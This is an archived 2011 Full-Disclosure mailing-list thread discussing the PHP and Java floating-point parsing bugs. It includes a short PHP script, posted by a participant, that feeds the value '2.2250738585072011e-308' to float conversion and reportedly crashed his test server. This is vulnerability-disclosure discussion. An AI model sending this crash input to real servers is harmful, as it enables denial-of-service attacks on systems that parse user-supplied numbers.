[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] [Fwd: Re: {Java,PHP} Server Exploits]
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] [Fwd: Re: {Java,PHP} Server Exploits]
- From: Leon Kaiser <literalka@xxxxxxxxx>
- Date: Thu, 10 Feb 2011 11:40:28 -0500
From: Leon Kaiser <literalka@xxxxxxxxx>
Reply-to: literalka@xxxxxxx
To: Cal Leeming [Simplicity Media Ltd]
<cal.leeming@xxxxxxxxxxxxxxxxxxxxxxxx>
Subject: Re: [Full-disclosure] {Java,PHP} Server Exploits
Date: Wed, 09 Feb 2011 19:15:36 -0500
Years, if I'm not mistaken.
========================================================
Leon Kaiser - Head of GNAA Public Relations -
literalka@xxxxxxx || literalka@xxxxxxxxx
http://gnaa.eu || http://security.goatse.fr
7BEECD8D FCBED526 F7960173 459111CE F01F9923
"The mask of anonymity is not intensely constructive."
-- Andrew "weev" Auernheimer
========================================================
> On Wed, 2011-02-09 at 20:00 +0000, Cal Leeming [Simplicity Media Ltd]
> wrote:
>
> > Christian, this issue has been 'floating' around for several months
> > now.
> >
> > On Wed, Feb 9, 2011 at 7:56 PM, Christian Sciberras
> > <uuf6429@xxxxxxxxx> wrote:
> >
> > Ah, been reading more about it, seems it was fixed.
> >
> > Still, there should have been safeguards around this - I'm
> > thinking they should check existing conversion routines to
> > ensure they're safe...
> >
> >
> >
> >
> >
> > On Wed, Feb 9, 2011 at 8:54 PM, Christian Sciberras
> > <uuf6429@xxxxxxxxx> wrote:
> >
> > Was it fixed? What's the current status?
> >
> > The sounds like a major issue, and the lack of info
> > about it is darn impressive.
> >
> >
> > I tried it on my test Windows WAMP server:
> >
> > <?php
> >
> > ob_implicit_flush(true);
> >
> > echo 'Start test...<br/>';
> >
> > $f=(float)"2.2250738585072011e-308";
> > echo 'Try 1 => '.$f.'</br>';
> >
> > $f=floatval("2.2250738585072011e-308");
> > echo 'Try 2 => '.$f.'</br>';
> >
> > $f="2.2250738585072011e-308";
> > echo 'Try 3 => '.(float)$f.'</br>';
> >
> > echo 'Test failed, server not vulnerable!</br>';
> >
> > ?>
> >
> > All three tests succeeded in crashing the server.
> >
> > With all due respect, this should NOT have been
> > disclosed without being FIXED (as it seems to me).
> > Plus, I'm a bit amazed such a bug exists in PHP -
> > since converting to floating point is a trivial
> > operation, it should have been limited and
> > safe-guarded from the start.
> > There are a lot of servers out there happily
> > accepting input as floating point values, this bug
> > should be top priority...
> >
> >
> > Chris.
> >
> >
> >
> > On Wed, Feb 9, 2011 at 6:40 PM, Leon Kaiser
> > <literalka@xxxxxxxxx> wrote:
> >
> >
> >
> > http://developers.slashdot.org/story/11/02/09/025237/Java-Floating-Point-Bug-Can-Lock-Up-Servers
> >
> > http://it.slashdot.org/story/11/01/06/1820208/PHP-Floating-Point-Bug-Crashes-Server
> >
> >
> >
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter:
> >
> > http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia -
> > http://secunia.com/
> >
> >
> >
> >
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter:
> > http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/